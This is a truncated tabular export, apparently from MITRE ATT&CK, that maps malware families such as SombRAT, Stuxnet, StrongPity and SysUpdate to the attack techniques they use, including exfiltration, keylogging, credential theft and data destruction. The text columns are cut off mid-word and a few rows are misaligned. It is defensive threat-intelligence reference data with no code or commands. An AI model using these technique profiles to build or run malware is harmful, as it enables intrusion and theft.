S0615 SombRAT malware-- software uses T1070.004File Deleti attack-pat technique [SombRAT]
S0615 SombRAT malware-- software uses T1083 File and Di attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1105 Ingress Tooattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1074.001Local Data attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1036 Masqueradattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1106 Native API attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1095 Non-Applicattack-pat technique [SombRAT](h
S0615 SombRAT malware-- software uses T1027 Obfuscatedattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1564.010Process Ar attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1057 Process Di attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1090 Proxy attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1573.001Symmetric attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1082 System Inf attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1033 System Own attack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1007 System Serattack-pat technique [SombRAT](
S0615 SombRAT malware-- software uses T1124 System Timattack-pat technique [SombRAT](
S0516 SoreFang malware-- software uses T1140 Deobfuscatattack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1087.002Domain Acattack-pat technique [SoreFang]
S0516 SoreFang malware-- software uses T1069.002Domain Grattack-pat technique [SoreFang]
S0516 SoreFang malware-- software uses T1190 Exploit Pubattack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1083 File and Di attack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1105 Ingress Tooattack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1087.001Local Acco attack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1027 Obfuscatedattack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1057 Process Di attack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1053.005Scheduled attack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1082 System Inf attack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1016 System Netattack-pat technique [SoreFang](
S0516 SoreFang malware-- software uses T1071.001Web Protocattack-pat technique [SoreFang](
S0543 Spark malware--0software uses T1140 Deobfuscatattack-pat technique [Spark](htt
S0543 Spark malware--0software uses T1041 Exfiltratio attack-pat technique [Spark](htt
S0543 Spark malware--0software uses T1027.002Software Pattack-pat technique [Spark](htt
S0543 Spark malware--0software uses T1132.001Standard Eattack-pat technique [Spark](ht
S0543 Spark malware--0software uses T1082 System Inf attack-pat technique [Spark](htt
S0543 Spark malware--0software uses T1614.001System Lanattack-pat technique [Spark](ht
S0543 Spark malware--0software uses T1033 System Own attack-pat technique [Spark](ht
S0543 Spark malware--0software uses T1497.002User Activiattack-pat technique [Spark](htt
S0543 Spark malware--0software uses T1071.001Web Protocattack-pat technique [Spark](ht
S0543 Spark malware--0software uses T1059.003Windows Cattack-pat technique [Spark](ht
S0374 SpeakUp malware-- software uses T1059 Command attack-pat
an technique [SpeakUp](h
S0374 SpeakUp malware-- software uses T1053.003Cron attack-pat technique [SpeakUp](h
S0374 SpeakUp malware-- software uses T1027.013Encrypted/attack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1203 Exploitatioattack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1070.004File Deleti attack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1105 Ingress Tooattack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1046 Network Seattack-pat technique [SpeakUp](h
S0374 SpeakUp malware-- software uses T1110.001Password Gattack-pat technique [SpeakUp](h
S0374 SpeakUp malware-- software uses T1059.006Python attack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1132.001Standard Eattack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1082 System Inf attack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1016 System Netattack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1049 System Netattack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1033 System Own attack-pat technique [SpeakUp](
S0374 SpeakUp malware-- software uses T1071.001Web Protocattack-pat technique [SpeakUp](
S1140 Spica malware-- software uses T1560 Archive Coattack-pat technique [Spica](htt
S1140 Spica malware-- software uses T1140 Deobfuscatattack-pat technique Upon execu
S1140 Spica malware-- software uses T1083 File and Di attack-pat technique [Spica](htt
S1140 Spica malware-- software uses T1105 Ingress Tooattack-pat technique [Spica](ht
S1140 Spica malware-- software uses T1036.004Masquerade attack-pat technique [Spica](ht
S1140 Spica malware-- software uses T1095 Non-Applicattack-pat technique [Spica](ht
S1140 Spica malware-- software uses T1059.001PowerShellattack-pat technique [Spica](ht
S1140 Spica malware-- software uses T1053.005Scheduled attack-pat technique [Spica](ht
S1140 Spica malware-- software uses T1539 Steal Web attack-pat technique [Spica](htt
S0646 SpicyOmelemalware-- software uses T1553.002Code Signi attack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1005 Data from attack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1105 Ingress Tooattack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1059.007JavaScript attack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1204.001Malicious Lattack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1018 Remote Sysattack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1518.001Security S attack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1518 Software Dattack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1566.002Spearphishattack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1082 System Inf attack-pat technique [SpicyOmel
S0646 SpicyOmelemalware-- software uses T1016 System Netattack-pat technique [SpicyOmel
S1030 Squirrelwafmalware--3software uses T1560.003Archive vi attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1140 Deobfuscatattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1027.013Encrypted/attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1041 Exfiltratio attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1105 Ingress Tooattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1204.002Malicious Fattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1204.001Malicious Lattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1059.001PowerShellattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1218.010Regsvr32 attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1218.011Rundll32 attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1027.002Software Pattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1566.001Spearphishattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1566.002Spearphishattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1132.001Standard Eattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1082 System Inf attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1016 System Netattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1033 System Own attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1497 Virtualiza attack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1059.005Visual Basiattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1071.001Web Protocattack-pat technique [Squirrelwa
S1030 Squirrelwafmalware--3software uses T1059.003Windows Cattack-pat technique [Squirrelwa
S0058 SslMM malware-- software uses T1134 Access Tokattack-pat technique [SslMM](htt
S0058 SslMM malware-- software uses T1562.001Disable or attack-pat technique [SslMM](htt
S0058 SslMM malware-- software uses T1008 Fallback C attack-pat technique [SslMM](ht
S0058 SslMM malware-- software uses T1056.001Keyloggingattack-pat technique [SslMM](ht
S0058 SslMM malware-- software uses T1036.005Match Legiattack-pat technique To establis
S0058 SslMM malware-- software uses T1547.001Registry Ruattack-pat technique To establis
S0058 SslMM malware-- software uses T1547.009Shortcut Mattack-pat technique To establis
S0058 SslMM malware-- software uses T1082 System Inf attack-pat technique [SslMM](htt
S0058 SslMM malware-- software uses T1033 System Own attack-pat technique [SslMM](ht
S0188 Starloader malware-- software uses T1140 Deobfuscatattack-pat technique [Starloader
S0188 Starloader malware-- software uses T1036.005Match Legiattack-pat technique [Starloade
S0380 StoneDrill malware-- software uses T1485 Data Destrattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1561.001Disk Conteattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1561.002Disk Struc attack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1027.013Encrypted/attack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1070.004File Deleti attack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1105 Ingress Tooattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1055 Process Injattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1012 Query Regiattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1113 Screen Capattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1518.001Security S attack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1082 System Inf attack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1124 System Timattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1497 Virtualiza attack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1059.005Visual Basiattack-pat technique [StoneDrill
S0380 StoneDrill malware-- software uses T1047 Windows M attack-pat technique [StoneDrill
S0142 StreamEx malware-- software uses T1083 File and Di attack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1112 Modify Regattack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1027 Obfuscatedattack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1057 Process Di attack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1218.011Rundll32 attack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1518.001Security S attack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1082 System Inf attack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1059.003Windows Cattack-pat technique [StreamEx](
S0142 StreamEx malware-- software uses T1543.003Windows Se attack-pat technique [StreamEx](
S1034 StrifeWatemalware-- software uses T1005 Data from attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1041 Exfiltratio attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1070.004File Deleti attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1083 File and Di attack-pat technique [StrifeWat
S1034 StrifeWatemalware-- software uses T1105 Ingress Tooattack-pat technique [StrifeWat
S1034 StrifeWatemalware-- software uses T1036.005Match Legiattack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1106 Native API attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1053 Scheduled attack-pat technique [StrifeWat
S1034 StrifeWatemalware-- software uses T1113 Screen Capattack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1573.001Symmetric attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1082 System Inf attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1033 System Own attack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1124 System Timattack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1497.003Time Basedattack-pat technique [StrifeWate
S1034 StrifeWatemalware-- software uses T1059.003Windows Cattack-pat technique [StrifeWat
S0491 StrongPity malware-- software uses T1560.003Archive vi attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1573.002Asymmetricattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1119 Automatedattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1020 Automatedattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1553.002Code Signi attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1562.001Disable or attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1027.013Encrypted/attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1041 Exfiltratio attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1070.004File Deleti attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1083 File and Di attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1564.003Hidden Wi attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1105 Ingress Tooattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1204.002Malicious Fattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1036.004Masquerade attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1036.005Match Legiattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1090.003Multi-hop attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1571 Non-Standaattack-pat technique [StrongPity](https://attack.m
S0491 StrongPity malware-- software uses T1059.001PowerShellattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1057 Process Di attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1547.001Registry Ruattack-pat technique [StrongPit
S0491 StrongPity malware-- software uses T1518.001Security S attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1569.002Service Ex attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1082 System Inf attack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1016 System Netattack-pat technique [StrongPity
S0491 StrongPity malware-- software uses T1071.001Web Protocattack-pat technique [StrongPit
S0491 StrongPity malware-- software uses T1543.003Windows Se attack-pat technique [StrongPity
S0603 Stuxnet malware-- software uses T1560.003Archive vi attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1553.002Code Signi attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1078.001Default Ac attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1140 Deobfuscatattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1087.002Domain Acattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1078.002Domain Acattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1055.001Dynamic-linattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1027.013Encrypted/attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1480 Execution attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1041 Exfiltratio attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1068 Exploitatioattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1210 Exploitatioattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1008 Fallback C attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1070.004File Deleti attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1083 File and Di attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1562 Impair Defattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1070 Indicator attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1090.001Internal Prattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1570 Lateral Tooattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1087.001Local Acco attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1112 Modify Regattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1106 Native API attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1135 Network Shattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1120 Peripheral attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1012 Query Regiattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1021 Remote Serattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1091 Replicatio attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1014 Rootkit attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1021.002SMB/Windo attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1505.001SQL Storedattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1053.005Scheduled attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1518.001Security S attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1129 Shared Moattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1132.001Standard Eattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1573.001Symmetric attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1082 System Inf attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1016 System Netattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1124 System Timattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1080 Taint Shar attack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1070.006Timestompattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1134.001Token Impeattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1071.001Web Protocattack-pat technique [Stuxnet](h
S0603 Stuxnet malware-- software uses T1047 Windows M attack-pat technique [Stuxnet](
S0603 Stuxnet malware-- software uses T1543.003Windows Se attack-pat technique [Stuxnet](h
S0018 Sykipot malware-- software uses T1573.002Asymmetricattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1087.002Domain Acattack-pat technique [Sykipot](
S0018 Sykipot malware-- software uses T1055.001Dynamic-linattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1056.001Keyloggingattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1111 Multi-Factoattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1057 Process Di attack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1547.001Registry Ruattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1018 Remote Sysattack-pat technique [Sykipot](
S0018 Sykipot malware-- software uses T1016 System Netattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1049 System Netattack-pat technique [Sykipot](h
S0018 Sykipot malware-- software uses T1007 System Serattack-pat technique [Sykipot](h
S0242 SynAck malware-- software uses T1070.001Clear Windattack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1486 Data Encryattack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1083 File and Di attack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1112 Modify Regattack-pat technique [SynAck](h
S0242 SynAck malware-- software uses T1106 Native API attack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1027 Obfuscatedattack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1057 Process Di attack-pat technique [SynAck](h
S0242 SynAck malware-- software uses T1055.013Process Doattack-pat technique [SynAck](h
S0242 SynAck malware-- software uses T1012 Query Regiattack-pat technique [SynAck](h
S0242 SynAck malware-- software uses T1497.001System Cheattack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1082 System Inf attack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1614.001System Lanattack-pat technique [SynAck](ht
S0242 SynAck malware-- software uses T1033 System Own attack-pat technique [SynAck](h
S0242 SynAck malware-- software uses T1007 System Serattack-pat technique [SynAck](h
S0060 Sys10 malware--7software uses T1069.001Local Grouattack-pat technique [Sys10](htt
S0060 Sys10 malware--7software uses T1573.001Symmetric attack-pat technique [Sys10](htt
S0060 Sys10 malware--7software uses T1082 System Inf attack-pat technique [Sys10](htt
S0060 Sys10 malware--7software uses T1016 System Netattack-pat technique [Sys10](htt
S0060 Sys10 malware--7software uses T1033 System Own attack-pat technique [Sys10](htt
S0060 Sys10 malware--7software uses T1071.001Web Protocattack-pat technique [Sys10](ht
S0663 SysUpdatemalware--csoftware uses T1553.002Code Signi attack-pat technique [SysUpdate]
[SysUpdate](https://attack.m
S0663 SysUpdatemalware--csoftware uses T1574.002DLL Side-L attack-pat technique
S0663 SysUpdatemalware--csoftware uses T1071.004DNS attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1005 Data from attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1140 Deobfuscatattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1027.013Encrypted/attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1041 Exfiltratio attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1070.004File Deleti attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1083 File and Di attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1027.011Fileless St attack-pat technique [SysUpdate
S0663 SysUpdatemalware--csoftware uses T1564.001Hidden Fileattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1105 Ingress Tooattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1016.001Internet C attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1036.004Masquerade attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1112 Modify Regattack-pat technique [SysUpdate
S0663 SysUpdatemalware--csoftware uses T1106 Native API attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1057 Process Di attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1547.001Registry Ruattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1113 Screen Capattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1569.002Service Ex attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1027.002Software Pattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1132.001Standard Eattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1573.001Symmetric attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1082 System Inf attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1016 System Netattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1033 System Own attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1007 System Serattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1543.002Systemd Seattack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1047 Windows M attack-pat technique [SysUpdate]
S0663 SysUpdatemalware--csoftware uses T1543.003Windows Se attack-pat technique [SysUpdate]
S0096 Systeminfotool--7fcb software uses T1082 System Inf attack-pat technique [Systeminfo
S0098 T9000 malware-- software uses T1546.010AppInit DL attack-pat technique If a victi
S0098 T9000 malware-- software uses T1560.003Archive vi attack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1123 Audio Captattack-pat technique [T9000](ht
S0098 T9000 malware-- software uses T1119 Automatedattack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1574.002DLL Side-L attack-pat technique During the
S0098 T9000 malware-- software uses T1120 Peripheral attack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1113 Screen Capattack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1518.001Security S attack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1082 System Inf attack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1016 System Netattack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1033 System Own attack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1124 System Timattack-pat technique [T9000](htt
S0098 T9000 malware-- software uses T1125 Video Captattack-pat technique [T9000](ht
S0586 TAINTEDSCmalware-- software uses T1560 Archive Coattack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1027.001Binary Padattack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1008 Fallback C attack-pat technique [TAINTEDSCR
S0586 TAINTEDSCmalware-- software uses T1070.004File Deleti attack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1083 File and Di attack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1105 Ingress Tooattack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1036.005Match Legiattack-pat technique The [TAINT
S0586 TAINTEDSCmalware-- software uses T1057 Process Di attack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1001.003Protocol o attack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1547.001Registry Ruattack-pat technique [TAINTEDSCR
S0586 TAINTEDSCmalware-- software uses T1018 Remote Sysattack-pat technique The [TAINT
S0586 TAINTEDSCmalware-- software uses T1573.001Symmetric attack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1082 System Inf attack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1124 System Timattack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1070.006Timestompattack-pat technique [TAINTEDSC
S0586 TAINTEDSCmalware-- software uses T1059.003Windows Cattack-pat technique [TAINTEDSC
S0164 TDTESS malware-- software uses T1070.004File Deleti attack-pat technique [TDTESS](ht
S0164 TDTESS malware-- software uses T1105 Ingress Tooattack-pat technique [TDTESS](ht
S0164 TDTESS malware-- software uses T1070.006Timestompattack-pat technique After creat
S0164 TDTESS malware-- software uses T1059.003Windows Cattack-pat technique [TDTESS](ht
S0164 TDTESS malware-- software uses T1543.003Windows Se attack-pat technique If running
S0560 TEARDROPmalware--3software uses T1140 Deobfuscatattack-pat technique [TEARDROP]
S0560 TEARDROPmalware--3software uses T1036.005Match Legiattack-pat technique [TEARDROP]
S0560 TEARDROPmalware--3software uses T1112 Modify Regattack-pat technique [TEARDROP]
S0560 TEARDROPmalware--3software uses T1027 Obfuscatedattack-pat technique [TEARDROP]
S0560 TEARDROPmalware--3software uses T1012 Query Regiattack-pat technique [TEARDROP]
S0560 TEARDROPmalware--3software uses T1543.003Windows Se attack-pat technique [TEARDROP]
S0146 TEXTMATEmalware-- software uses T1071.004DNS attack-pat technique [TEXTMATE]
S0146 TEXTMATEmalware-- software uses T1059.003Windows Cattack-pat technique [TEXTMATE]
S0131 TINYTYPH malware-- software uses T1020 Automatedattack-pat technique When a doc
S0131 TINYTYPH malware-- software uses T1027.013Encrypted/attack-pat technique [TINYTYPHON
S0131 TINYTYPH malware-- software uses T1083 File and Di attack-pat technique [TINYTYPHON
S0131 TINYTYPH malware-- software uses T1547.001Registry Ruattack-pat technique [TINYTYPHON
S0436 TSCookie malware--7software uses T1555.003Credential attack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1140 Deobfuscatattack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1083 File and Di attack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1105 Ingress Tooattack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1204.001Malicious Lattack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1095 Non-Applicattack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1057 Process Di attack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1055 Process Injattack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1090 Proxy attack-pat technique [TSCookie]
S0436 TSCookie malware--7software uses T1573.001Symmetric attack-pat technique [TSCookie]
S0436 TSCookie malware--7software uses T1016 System Netattack-pat technique [TSCookie](
S0436 TSCookie malware--7software uses T1071.001Web Protocattack-pat technique [TSCookie]
S0436 TSCookie malware--7software uses T1059.003Windows Cattack-pat technique [TSCookie](
S0199 TURNEDUPmalware--dsoftware uses T1055.004Asynchronoattack-pat technique [TURNEDUP](
S0199 TURNEDUPmalware--dsoftware uses T1105 Ingress Tooattack-pat technique [TURNEDUP](
S0199 TURNEDUPmalware--dsoftware uses T1547.001Registry Ruattack-pat technique [TURNEDUP](
S0199 TURNEDUPmalware--dsoftware uses T1113 Screen Capattack-pat technique [TURNEDUP](
S0199 TURNEDUPmalware--dsoftware uses T1082 System Inf attack-pat technique [TURNEDUP]
S0199 TURNEDUPmalware--dsoftware uses T1059.003Windows Cattack-pat technique [TURNEDUP](
S0263 TYPEFRAMmalware-- software uses T1140 Deobfuscatattack-pat technique One [TYPEF
S0263 TYPEFRAMmalware-- software uses T1562.004Disable or attack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1027.013Encrypted/attack-pat technique APIs and s
S0263 TYPEFRAMmalware-- software uses T1070.004File Deleti attack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1083 File and Di attack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1027.011Fileless St attack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1105 Ingress Tooattack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1204.002Malicious Fattack-pat technique A Word doc
S0263 TYPEFRAMmalware-- software uses T1112 Modify Regattack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1571 Non-Standaattack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1090 Proxy attack-pat technique A [TYPEFRA
S0263 TYPEFRAMmalware-- software uses T1082 System Inf attack-pat technique [TYPEFRAME
